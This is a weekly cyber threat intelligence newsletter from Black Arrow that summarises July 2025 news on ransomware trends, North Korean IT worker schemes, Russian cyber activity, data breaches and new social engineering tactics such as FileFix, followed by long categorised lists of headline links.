An American woman has been sentenced to over eight years in prison for helping North Korean IT workers pose as US-based staff and secure jobs at over 300 companies, generating more than $17 million in illicit income. The scheme involved shipping corporate laptops abroad, forging payroll documents and using stolen identities. North Korea is believed to operate up to 4,000 such IT workers worldwide, generating as much as $600 million annually to fund state objectives. In response, the US has offered rewards of up to $15 million for information leading to the arrest of individuals involved in these activities.
UK Announces Sanctions Against Russian Cyber Units Over Threats to Europe
The UK has imposed sanctions on over 20 Russian individuals and entities linked to cyber attacks across Europe. Those named include officers from Russia’s military intelligence agency accused of targeting democratic institutions, media, energy networks and communications infrastructure. The sanctions follow broader efforts to disrupt Russian disinformation campaigns and respond to operations by groups such as NoName057(16), which has targeted political events across the EU. UK officials described these activities as part of a deliberate campaign to destabilise Europe and undermine both Ukrainian sovereignty and British security interests.
Governance, Risk and Compliance
Most cyber risks driven by few employees, study shows | SC Media
Threats
Ransomware, Extortion and Destructive Attacks
UK Confirms Ransomware Payment Ban for Public Sector and CNI - Infosecurity Magazine
Marks & Spencer’s cyber attack isn’t an exception - it’s a warning | TechRadar
Nearly Half of MSPs Have Dedicated Kitty For Ransomware Incidents - IT Security Guru
SharePoint victim count hits 400+ orgs in ongoing attacks • The Register
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
UK facing ‘very significant’ volume of cyber attacks, security minister warns | The Independent
UK’s Ransomware Payment Ban: Bold Strategy or Dangerous Gamble? - SecurityWeek
Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
Ransomware gang attacking NAS devices taken down in major police operation | TechRadar
CISA and FBI warn of escalating Interlock ransomware attacks
Ransomware Group Uses AI Chatbot to Intensify Pressure on Victims - Infosecurity Magazine
Storm-2603 spotted deploying ransomware on exploited SharePoint servers - Help Net Security
Worry about the basics of ransomware, not the AI threat - Tech Monitor
BlackSuit ransomware extortion sites seized in Operation Checkmate
New Phobos and 8base ransomware decryptor recover files for free
Wartime cyber attack wiped data from two major Iranian banks, expert says | Iran International
Ransomware Victims
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
Marks & Spencer’s cyber attack isn’t an exception - it’s a warning | TechRadar
Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine
The password that sank a 158-year-old business - IT Security Guru
Major European healthcare network discloses security breach
Two more entities have folded after ransomware attacks – DataBreaches.Net
Russian alcohol retailer WineLab closes stores after ransomware attack
Phishing & Email Based Attacks
Phishers have found a way to downgrade—not bypass—FIDO MFA - Ars Technica
'PoisonSeed' Attacker Skates Around FIDO Keys
UK ties GRU to stealthy Microsoft 365 credential-stealing malware
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
That “credit card security” email might be a trap | Cybernews
Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques
Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide
Other Social Engineering
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide
Accounting Firm Targeted by Malware Campaign Using New Crypter - Infosecurity Magazine
Threat Actors Leverage Zoho WorkDrive Folder to Deliver Obfuscated PureRAT Malware
Dark Web Hackers Moonlight as Travel Agents
Former #1 Movie Piracy Site "Strongly Linked" to Global Infostealer Activity * TorrentFreak
Fraud, Scams and Financial Crime
Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide
Researchers Found Nearly 600 Incidents of AI Fraud | Security Magazine
UK and Romania Crack Down on ATM Fraudster Network - Infosecurity Magazine
Coyote malware abuses Microsoft UIA to hunt banking creds • The Register
Fake Receipt Generators Fuel Rise in Online Fraud - Infosecurity Magazine
Return Fraud Is Rampant Thanks to Free Shipping, Customer Behavior - Business Insider
The fraud trends shaping 2025: Pressure builds on online retailers - Help Net Security
Head of AI company warns of AI fraud | The Independent
'Explosive growth' in number of Channel Island fraud complaints - Island FM
$17 Million Is Lost in ATM Scam That Spread on TikTok, Officials Say - The New York Times
Artificial Intelligence
68% of Organisations Experienced Data Leakage From Employee AI Usage | Security Magazine
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
Ransomware Group Uses AI Chatbot to Intensify Pressure on Victims - Infosecurity Magazine
How AI is changing the GRC strategy | CSO Online
People don't trust AI but they're increasingly using it anyway | ZDNET
Image watermarks meet their Waterloo with UnMarker • The Register
Researchers Found Nearly 600 Incidents of AI Fraud | Security Magazine
3 Ways Security Teams Can Minimize Agentic AI Chaos
How the EU Is Fighting Back Against Deepfakes - IT Security Guru
Nearly 2,000 MCP Servers Possess No Security Whatsoever
Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews
Worry about the basics of ransomware, not the AI threat - Tech Monitor
WeTransfer ToS adding 'machine learning' caused freakout • The Register
2FA/MFA
Phishers have found a way to downgrade—not bypass—FIDO MFA - Ars Technica
'PoisonSeed' Attacker Skates Around FIDO Keys
Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques
Veeam Recovery Orchestrator users locked out after MFA rollout
Malware
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
UK, NATO accuse Russia's GRU over malware created to 'destablise' Europe - Breaking Defense
UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine
CERT-UA Discovers LAMEHUG Malware Linked to APT28, Using LLM for Phishing Campaign
Lumma Stealer Malware Returns After Takedown Attempt - SecurityWeek
Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews
Coyote malware abuses Microsoft UIA to hunt banking creds • The Register
Accounting Firm Targeted by Malware Campaign Using New Crypter - Infosecurity Magazine
Threat Actors Leverage Zoho WorkDrive Folder to Deliver Obfuscated PureRAT Malware
A Startup is Selling Data Hacked from Peoples’ Computers to Debt Collectors
NCSC: Russian malware controls emails | Cybernews
Hackers breach Toptal GitHub account, publish malicious npm packages
npm phishing attack laces popular packages with malware • The Register
Stealth backdoor found in WordPress mu-Plugins folder
Cyber criminals are Targeting US Businesses with Malicious USB Drives: By Robert Siciliano
Former #1 Movie Piracy Site "Strongly Linked" to Global Infostealer Activity * TorrentFreak
Arch Linux pulls AUR packages that installed Chaos RAT malware
Warning: Hacker Might Be Prepping This Steam Game to Spread Malware
Threat Actors Weaponizing .hwp Files to Deliver RokRAT Malware
Bots/Botnets
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
Mobile
Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge
Here's What Phone Thieves Do to Prevent You From Tracking Your Device
5M Public, Unsecured Wi-Fi Networks Found Exposed | Security Magazine
This attack could give criminals control of your mobile or desktop browser - PhoneArena
Surveillance Firm Bypasses SS7 Protections to Retrieve User Location - SecurityWeek
MuddyWater deploys new DCHSpy variants amid Iran-Israel conflict
China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones
Internet of Things – IoT
Your office printer could be the easiest backdoor into company networks - so update now | TechRadar
Is your Ring camera showing strange logins? Here's what's going on | ZDNET
Ring tries to explain 'May 28' bug, but users aren't buying it - Android Authority
Enterprise printer security fails at every stage - Help Net Security
Update your printer! Over 700 models actively being attacked by hackers | PCWorld
When Your Power Meter Becomes a Tool of Mass Surveillance | Electronic Frontier Foundation
Data Breaches/Leaks
Startup takes personal data stolen by malware and sells it on to other companies | Malwarebytes
Most data breaches have unknown causes as transparency continues to fall - Help Net Security
A Startup is Selling Data Hacked from Peoples’ Computers to Debt Collectors
68% of Organisations Experienced Data Leakage From Employee AI Usage | Security Magazine
Holyrood | No evidence of data loss in Glasgow City Council cyber-attack, experts say
Inquiry after SAS identities leaked in new breach
Regulator Claims 9,000+ Clients' Data Hit Dark Web in Security Breach
Risika Data Breach Exposes 100M Swedish Records to Fraud Risks
France: New Data Breach Could Affect 340,000 Jobseekers - Infosecurity Magazine
People are getting over $4,000 from the T-Mobile data breach settlement
Dior begins sending data breach notifications to US customers
Dell scoffs at breach, says miscreants stole ‘fake data' • The Register
750,000 Impacted by Data Breach at The Alcohol & Drug Testing Service - SecurityWeek
Marketing, Law Firms Say Data Breaches Impact Over 200,000 People - SecurityWeek
Data breach feared after cyber attack on AMEOS hospitals in Germany – DataBreaches.Net
Major German media group falls victim to hacker attack – DW – 07/22/2025
1.4 Million Affected by Data Breach at Virginia Radiology Practice - SecurityWeek
Organised Crime & Criminal Actors
Dark Web Hackers Moonlight as Travel Agents
Europol Sting Leaves Russian 'NoName057(16)' Group Fractured
Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
New Wave of Crypto-Hijacking Infects 3,500+ Websites
3,500 Websites Hijacked to Secretly Mine Crypto Using Stealth JavaScript and WebSocket Tactics
Insider Risk and Insider Threats
Most cyber risks driven by few employees, study shows | SC Media
Supply Chain and Third Parties
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
Firmware Vulnerabilities Continue to Plague Supply Chain
Clorox accuses IT provider in lawsuit of giving hackers employee passwords - CNA
Sean Plankey vows to boot China from US supply chain, advocate for CISA budget
Cloud/SaaS
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday
UK blames Russia’s infamous ‘Fancy Bear’ group for Microsoft cloud hacks | CSO Online
Outages
Phone networks down: EE, BT, Three, and Vodafone all not working in mass outage | The Independent
Alaska’s system-wide ground stop ‘not a cyber security event’ | News | Flight Global
Has the media industry learned from the Crowdstrike outage? - TVBEurope
Encryption
UK May Backtrack on Controversial Demand for Backdoor to Encrypted Apple User Data - MacRumors
Linux and Open Source
Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews
How unvalidated code is putting UK national security at risk - Tech Monitor
Digital sovereignty becomes a matter of resilience for Europe - Help Net Security
Arch Linux pulls AUR packages that installed Chaos RAT malware
Passwords, Credential Stuffing & Brute Force Attacks
158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Weak Password
UK ties GRU to stealthy Microsoft 365 credential-stealing malware
The password that sank a 158-year-old business - IT Security Guru
Hard-Coded Credentials Found in HPE Instant On Devices Allow Admin Access
New QR Code Attack Via PDFs Evades Detection Systems and Harvest Credentials
Clorox accuses IT provider in lawsuit of giving hackers employee passwords - CNA
Hackers scanning for TeleMessage Signal clone flaw exposing passwords
Regulations, Fines and Legislation
UK Confirms Ransomware Payment Ban for Public Sector and CNI - Infosecurity Magazine
UK facing ‘very significant’ volume of cyber attacks, security minister warns | The Independent
UK’s Ransomware Payment Ban: Bold Strategy or Dangerous Gamble? - SecurityWeek
Monzo’s £21m fine highlights banks’ cyber security failures | Computer Weekly
Six months into DORA, most financial firms are still not ready - Help Net Security
UK May Backtrack on Controversial Demand for Backdoor to Encrypted Apple User Data - MacRumors
ENISA Turns to Experts to Steer EU Cyber Regulations
Over 80% solar inverters Chinese-made, India moves to shield power grid from cyber risks
UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday
Sean Plankey vows to boot China from US supply chain, advocate for CISA budget
Government responds to feedback on ransomware consultation | Practical Law
After website hack, Arizona election officials unload on Trump’s CISA | CyberScoop
Models, Frameworks and Standards
Six months into DORA, most financial firms are still not ready - Help Net Security
Careers, Working in Cyber and Information Security
AI is here, but you still need juniors, say cyber security pros | Cybernews
How to Advance from SOC Manager to CISO?
How to Build a Cyber Security Team to Maximize Business Impact
How to land your first job in cyber security - Help Net Security
Law Enforcement Action and Take Downs
Lumma Stealer Malware Returns After Takedown Attempt - SecurityWeek
Europol targets Kremlin-backed cyber crime gang NoName057(16)
Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace
UK and Romania Crack Down on ATM Fraudster Network - Infosecurity Magazine
Ransomware gang attacking NAS devices taken down in major police operation | TechRadar
Operator of Jetflicks illegal streaming service gets 7 years in prison
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
NATO Condemns Russian Malicious Cyber Activities – Statement – Eurasia Review
UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine
NATO countries to employ full range of capabilities to counter cyber threats from Russia – Rutte
Russian sabotage attacks surged across Europe in 2024
Russian trawlers threaten vital undersea cables in Atlantic
Europe cyber attacks surge amid geopolitical tensions | Cybernews
UK sanctions Russian cyber spies accused of facilitating murders – DataBreaches.Net
UK uncovers novel Microsoft snooping malware, blames GRU • The Register
NCSC: Russian malware controls emails | Cybernews
Why it's time for the US to go on offense in cyber space | CyberScoop
Recovery IS strength: The test of American cyber power | SC Media
China-Backed APT41 Attack Surfaces in Africa
China-Linked Hackers Launch Targeted Espionage Campaign on African IT Infrastructure
Opinion | To fight cyberwar, the US must establish a tech academy - The Washington Post
Nation State Actors
Europe cyber attacks surge amid geopolitical tensions | Cybernews
How Can Companies Guard Against Rising Nation-State Cyber Threats? | Phelps Dunbar - JDSupra
China
3 China Nation-State Actors Target SharePoint Bugs
Over 80% solar inverters Chinese-made, India moves to shield power grid from cyber risks
Sean Plankey vows to boot China from US supply chain, advocate for CISA budget
China-Backed APT41 Attack Surfaces in Africa
China-Linked Hackers Launch Targeted Espionage Campaign on African IT Infrastructure
China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones
Singapore warns China-linked group UNC3886 targets its critical infrastructure
China warns of backdoored devices, on land and under the sea • The Register
Russia
NATO Condemns Russian Malicious Cyber Activities – Statement – Eurasia Review
UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine
NATO countries to employ full range of capabilities to counter cyber threats from Russia – Rutte
British institutions to be banned from paying ransoms to Russian hackers – POLITICO
UK, NATO accuse Russia's GRU over malware created to 'destablise' Europe - Breaking Defense
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
Russian sabotage attacks surged across Europe in 2024
Russian trawlers threaten vital undersea cables in Atlantic
Europol Sting Leaves Russian 'NoName057(16)' Group Fractured
UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday
UK ties GRU to stealthy Microsoft 365 credential-stealing malware
CERT-UA Discovers LAMEHUG Malware Linked to APT28, Using LLM for Phishing Campaign
UK sanctions Russian cyber spies accused of facilitating murders – DataBreaches.Net
Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace
Operation CargoTalon Attacking Russian Aerospace & Defence to Deploy EAGLET Implant
Russian alcohol retailer WineLab closes stores after ransomware attack
Iran
MuddyWater deploys new DCHSpy variants amid Iran-Israel conflict
Iran-Linked DCHSpy Android Malware Masquerades as VPN Apps to Spy on Dissidents
Iranian Hackers Deploy New Android Spyware Version - Infosecurity Magazine
Will An Iran Cyber Attack Panic Usher In A New Patriot Act? – OpEd – Eurasia Review
Ex-IDF cyber chief talks Iran, Scattered Spider with The Reg • The Register
Wartime cyber attack wiped data from two major Iranian banks, expert says | Iran International
North Korea
Europe cyber attacks surge amid geopolitical tensions | Cybernews
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
From Missiles to Malware: India-Pakistan Cyber Rivalry and Lessons for Taiwan – Taiwan Insight
Tools and Controls
Ransomware gang attacking NAS devices taken down in major police operation | TechRadar
AI is here, but you still need juniors, say cyber security pros | Cybernews
As AI tools take hold in cyber security, entry-level jobs could shrink - Help Net Security
Firmware Vulnerabilities Continue to Plague Supply Chain
Your office printer could be the easiest backdoor into company networks - so update now | TechRadar
Enterprise printer security fails at every stage - Help Net Security
Update your printer! Over 700 models actively being attacked by hackers | PCWorld
Majority of CISOs Lack Full Visibility Over APIs - IT Security Guru
How to harden your Active Directory against Kerberoasting
What Makes Great Threat Intelligence?
How to Use Threat Intelligence to Enhance Cyber Security Operations
DNS security is important but is DNSSEC a failed experiment? • The Register
Veeam Recovery Orchestrator users locked out after MFA rollout
3 Ways Security Teams Can Minimize Agentic AI Chaos
Reclaiming Control: How Enterprises Can Fix Broken Security Operations - SecurityWeek
Your app is under attack every 3 minutes - Help Net Security
China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones
Other News
What To Know About Dangerous Airport And Airline Cyber Attacks, And Why They're On The Rise
Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine
Summer habits could increase cyber risk to enterprise data - Data Centre & Network News
From beaches to breaches: Summer work habits put enterprise data at risk - Digital Journal
NATO warns ports vulnerable to 'unprecedented' cyber threats - FreightWaves
Meta and Google are laying a fast-growing web of mega subsea cables
Ports are getting smarter and more hackable - Help Net Security
Coast Guard Issues Cyber Rule for Maritime Transport Safety
World Health Organisation CISO on securing global health emergencies - Help Net Security
Loaf and order: Belgian police launch bread-based cyber security campaign • Graham Cluley
Basic cyber security lapses are leaving US infrastructure exposed, top experts warn - Nextgov/FCW
How did Stuxnet impact cyber operations? The US House aims to find out | SC Media
Vulnerability Management
Microsoft Put Older Versions of SharePoint on Life Support. Hackers Are Taking Advantage | WIRED
Update your printer! Over 700 models actively being attacked by hackers | PCWorld
How quickly do we patch? A quick look from the global viewpoint - SANS Internet Storm Center
VMware portal prevents some users from downloading patches • The Register
Vulnerabilities
Microsoft Put Older Versions of SharePoint on Life Support. Hackers Are Taking Advantage | WIRED
SharePoint victim count hits 400+ orgs in ongoing attacks • The Register
Microsoft says some SharePoint hackers now using ransomware | Reuters
CitrixBleed 2: 100 Organisations Hacked, Thousands of Instances Still Vulnerable - SecurityWeek
Microsoft fixes two SharePoint zero-days under attack, but it's not over - how to patch | ZDNET
Cisco confirms active exploitation of ISE and ISE-PIC flaws
Hardcoded credentials found in HPE Aruba Instant On Wi-Fi devices
Critical Vulnerabilities Patched in Sophos Firewall - SecurityWeek
SonicWall Patches Critical SMA 100 Vulnerability, Warns of Recent Malware Attack - SecurityWeek
Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques
Microsoft mistakenly tags Windows Firewall error log bug as fixed
New 7-Zip Vulnerability Enables Malicious RAR5 File to Crash Your System
Another massive security snafu hits Microsoft • The Register
High-Severity Flaws Patched in Chrome, Firefox - SecurityWeek
High-Severity Flaws Patched in Chrome, Firefox - SecurityWeek
Critical Mitel Flaw Lets Hackers Bypass Login, Gain Full Access to MiVoice MX-ONE Systems
Critical NVIDIA Container Toolkit Flaw Allows Privilege Escalation on AI Cloud Services
Hackers Exploit Critical CrushFTP Flaw to Gain Admin Access on Unpatched Servers
VMware portal prevents some users from downloading patches • The Register
CISA Warns: SysAid Flaws Under Active Attack Enable Remote File Access and SSRF
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 18 July 2025
Black Arrow Cyber Threat Intelligence Briefing 18 July 2025:
-Most Cyber Security Risk Comes from Just 10% of Employees
-Stop Settling for Check-the-Box Cyber Security Policies
-A New, Silent Social Engineering Attack Is Being Used by Hackers; Your Security Systems Might Not Notice Until It’s Too Late
-Firms Have a Fake North Korean IT Worker Problem – Here’s How to Stop It
-Orgs and Individuals Clinging to Windows 10 Face Heightened Risk, Says NCSC
-Supplier Risk Is Breaking the Size Myth in Cyber
-Most European Financial Firms Still Lagging on DORA Compliance
-AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks
-Ransomware Surges 63% in Q2
-All 6.5m Co-Op Members Had Data Stolen in Recent Cyber Attack, Retailer Admits
-North Korean Hackers Blamed for Record Spike in Crypto Thefts in 2025
-Russia Shifts Cyber War Focus from US to UK Following Trump’s Election
-Europol Disrupts Major Network of Russian-Speaking Cyber Criminals Targeting Ukraine and Its Allies
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
In our briefing this week, and continuing our opening theme from last week, we share research insights that just 10% of employees account for nearly three quarters of all risky behaviour in the workplace, and the need to have cyber security policies that reflect the realities of the workplace and create a security culture. We also report on a new social engineering tactic that encourages employees to run malicious code for the attacker. Other employee risks continue to evolve, including the insider risk of recruiting North Korean IT workers who access sensitive data and extort the employer.
We highlight actions that organisations should focus on now: these include upgrading to Windows 11; managing the risks in their supply chain; and for those organisations in scope, progressing their compliance for DORA. We also highlight the evolving risk of AI cloaking tools, and the surge in ransomware. The consequences of attacks are emphasised by the breach of 6.5m customer records at the UK retailer Co-Op, and a record spike in crypto thefts by North Koreans. Finally, we include news of Russian state and citizen attackers focusing on the UK and Ukraine-aligned countries.
Top Cyber Stories of the Last Week
Most Cyber Security Risk Comes from Just 10% of Employees
A new study by Living Security and the Cyentia Institute has found that just 10% of employees account for nearly three quarters of all risky behaviour in the workplace, challenging assumptions about who poses the greatest cyber risk. Surprisingly, remote and part-time staff are generally less risky than their in-office, full-time colleagues. The report argues for focused action plans and controls for those employees who present the greatest risk.
https://www.helpnetsecurity.com/2025/07/16/human-cybersecurity-risk-employees/
Stop Settling for Check-the-Box Cyber Security Policies
Many organisations still rely on outdated or overly rigid cyber security policies that fail to reflect how work is actually done. This mismatch often drives employees to find workarounds, weakening overall defences. Complex password rules, poorly implemented multi-factor authentication, and generic training programmes are common pitfalls. A recent study found that 65% of office workers admit to bypassing policies, with 70% of IT leaders reporting unauthorised AI use. Effective cyber security requires policies that are practical, tailored to roles, and regularly updated based on real-world feedback, helping foster a security culture rather than just ticking compliance boxes.
https://www.helpnetsecurity.com/2025/07/15/stop-settling-for-check-the-box-cybersecurity-policies/
A New, Silent Social Engineering Attack Is Being Used by Hackers; Your Security Systems Might Not Notice Until It’s Too Late
Researchers have warned of a new social engineering tactic called FileFix, which exploits common user behaviour to silently trigger malicious commands. By encouraging users to paste a copied link into Windows File Explorer, attackers can run hidden code without raising security alerts. Although current tests involve harmless code, threat actors are already using the method in real-world scenarios, indicating likely progression to malware delivery. The technique does not rely on software flaws but manipulates user trust. Organisations are urged to enhance user awareness and review incident response plans to address this fast-evolving threat.
Firms Have a Fake North Korean IT Worker Problem – Here’s How to Stop It
A growing number of organisations are being targeted by fraudulent job applicants, many linked to North Korea, who use fake identities, deepfake videos, and AI-generated responses to secure remote IT roles. These individuals have successfully infiltrated major firms, sometimes gaining access to sensitive data and extorting employers. Some companies have reported hundreds of suspicious applications in just weeks. Key warning signs include impressive CVs with minimal LinkedIn presence, reluctance to attend in-person meetings, and inconsistencies in personal details. Without stronger collaboration between HR, legal, and cyber security teams, businesses remain vulnerable to these evolving and well-resourced threats.
https://www.theregister.com/2025/07/13/fake_it_worker_problem/
Orgs and Individuals Clinging to Windows 10 Face Heightened Risk, Says NCSC
The UK’s NCSC has warned that continued reliance on Windows 10 places organisations and individuals at increasing risk as the system nears end-of-life in October 2025. After this date, Microsoft will no longer provide security updates or support, making unpatched systems prime targets for cyber attacks. Despite being over a decade old, Windows 10 remains widely used, but the NCSC urges a move to Windows 11, which offers stronger built-in protections by default. Organisations delaying the upgrade risk undermining their cyber resilience and may fall short of basic security standards, such as those required under the UK’s Cyber Essentials certification.
Supplier Risk Is Breaking the Size Myth in Cyber
Organisations of all sizes face growing risk from cyber attacks targeting their suppliers, with over half of recent incidents linked to third parties. The number of globally disruptive cyber attacks has nearly doubled since 2020, and nearly half of affected businesses report revenue loss. Smaller firms are not shielded by size, and larger ones cannot rely on internal measures alone. Increasing use of artificial intelligence and global tensions are widening the threat landscape. Businesses are urged to map their supplier dependencies, assess third-party risks, and ensure continuity plans account for supplier failure.
Most European Financial Firms Still Lagging on DORA Compliance
Six months after DORA came into force, most European financial services firms still fall short of compliance, with 96% admitting their current data resilience measures are insufficient. Key challenges include oversight of third-party risks, increased pressure on IT teams, and rising costs from technology providers. One in five firms has yet to secure budget for implementation. Despite this, 94% now rank DORA as a higher organisational priority, with many integrating it into broader resilience plans. Regulators can impose significant fines for non-compliance, highlighting the urgency for firms to accelerate their cyber resilience efforts.
https://www.infosecurity-magazine.com/news/european-financial-dora-compliance/
AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks
Threat actors are now using AI-powered cloaking tools to hide phishing and malware sites from detection, making cyber attacks harder to identify. Services like Hoax Tech and JS Click Cloaker offer cloaking-as-a-service, using machine learning and behavioural profiling to show scam content to real uses while misleading security scanners. These tools assess hundreds of data points in real time and can personalise content to increase success. Experts warn this marks a serious shift in the threat landscape, urging organisations to adopt behaviour-based detection, multi-layered defences and adaptive technologies to stay ahead of these evolving threats.
https://www.infosecurity-magazine.com/news/ai-cloaking-tools-enable-complex/
Ransomware Surges 63% in Q2
Ransomware attacks surged by 63% in the second quarter of 2025, reaching a record 276 publicly disclosed incidents according to BlackFog. Each month in the quarter broke previous records, with June alone seeing a 113% year-on-year increase. Healthcare was the most targeted sector, followed by government and services, while retail also saw its highest ever Q2 attack levels, particularly in the UK. The Qilin ransomware group led activity, responsible for 10% of incidents. Over 80% of ransomware attacks remain undisclosed, with BlackFog estimating more than 1,400 hidden cases this quarter. The report reinforces the urgent need for stronger data protection measures.
https://betanews.com/2025/07/16/ransomware-surges-63-percent-in-q2/
All 6.5m Co-Op Members Had Data Stolen in Recent Cyber Attack, Retailer Admits
The UK retailer Co-op has confirmed that all 6.5 million of its members had their personal data stolen during a cyber attack earlier this year. The breach, which led to the shutdown of parts of its IT systems in April, allowed attackers to access names, addresses and contact details. The organisation's CEO described the impact on members and staff as devastating. This incident highlights the ongoing risk to large member-based organisations and the need for strong cyber security controls to protect personal data and maintain trust in the face of growing threats.
North Korean Hackers Blamed for Record Spike in Crypto Thefts in 2025
A surge in cryptocurrency thefts has seen over $2 billion stolen in the first half of 2025 alone, already exceeding losses for the whole of last year. A major breach at crypto exchange Bybit, reportedly carried out by North Korean hackers, accounted for $1.4 billion of this amount. The stolen funds are believed to be supporting North Korea’s nuclear programme and helping evade international sanctions. Analysts warn this reflects a broader strategy by North Korea, which includes using remote IT workers to infiltrate Western firms, steal intellectual property, and extort payments under threat of data leaks.
Russia Shifts Cyber War Focus from US to UK Following Trump’s Election
UK intelligence agencies have warned of a marked increase in Russian state-backed cyber attacks targeting British infrastructure since the start of 2025. This shift appears to be a deliberate move away from US targets following Donald Trump’s election, as the Kremlin aims to avoid provoking the new administration. The UK is now seen as Russia’s primary adversary, with threats focusing on disruption and chaos, particularly against critical infrastructure such as energy and healthcare. Officials have noted a surge in hybrid operations combining technology, misinformation and proxies, with some attacks traced to highly capable hacker groups operating under Russian direction.
Europol Disrupts Major Network of Russian-Speaking Cyber Criminals Targeting Ukraine and Its Allies
Europol has led a major international operation disrupting the cyber criminal group NoName057(16), known for targeting Ukraine and NATO countries with denial-of-service attacks. Coordinated across 12 nations, the effort dismantled a network of over 100 servers and resulted in arrests, searches, and legal action against key individuals. The group, with over 4,000 supporters, used gamified tactics and cryptocurrency rewards to encourage participation. Authorities say the attacks were ideologically driven and aimed at countries supporting Ukraine. This highlights the growing threat of politically motivated cyber attacks and the scale of coordination required to counter them.
Governance, Risk and Compliance
Most cyber security risk comes from just 10% of employees - Help Net Security
Compliance is evolving — Is your resilience ready? | TechRadar
True cyber resilience comes from culture | BFI
Factoring Cyber Security Into Finance's Digital Strategy
Turning Cyber Risk Into Boardroom Metrics That Matter
How to Calculate Cyber Security ROI for CEOs and Boards | TechTarget
Stop settling for check-the-box cyber security policies - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware surges 63 percent in Q2 - BetaNews
Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools
Nearly one-third of Irish firms paid a cyber ransom in last year
Wiper Malware: The Threat to Businesses | SC Media UK
French and UK Authorities Arrest Suspects in Ransomware Cases
Interlock ransomware adopts FileFix method to deliver malware
Interlock Ransomware Unleashes New RAT in Widespread Campaign - Infosecurity Magazine
Police disrupt “Diskstation” ransomware gang attacking NAS devices
Anatomy of a Scattered Spider attack: A growing ransomware threat evolves | CSO Online
Retail Ransomware Attacks Jump 58% Globally in Q2 2025 - Infosecurity Magazine
Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop
Microsoft Exposes Scattered Spider’s Latest Tactics - Infosecurity Magazine
Report: Global retail ransomware intrusions surge | SC Media
Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cyber Criminals
Ransomware Victims
Report: Global retail ransomware intrusions surge | SC Media
Four people bailed after arrests over cyber attacks on M&S, Harrods and Co-op - TheIndustry.fashion
Some Glasgow City Council online services still down | Glasgow Times
M&S resumes online recruitment following cyber attack - Retail Gazette
United Natural Foods Expects $400M revenue impact from June cyber attack
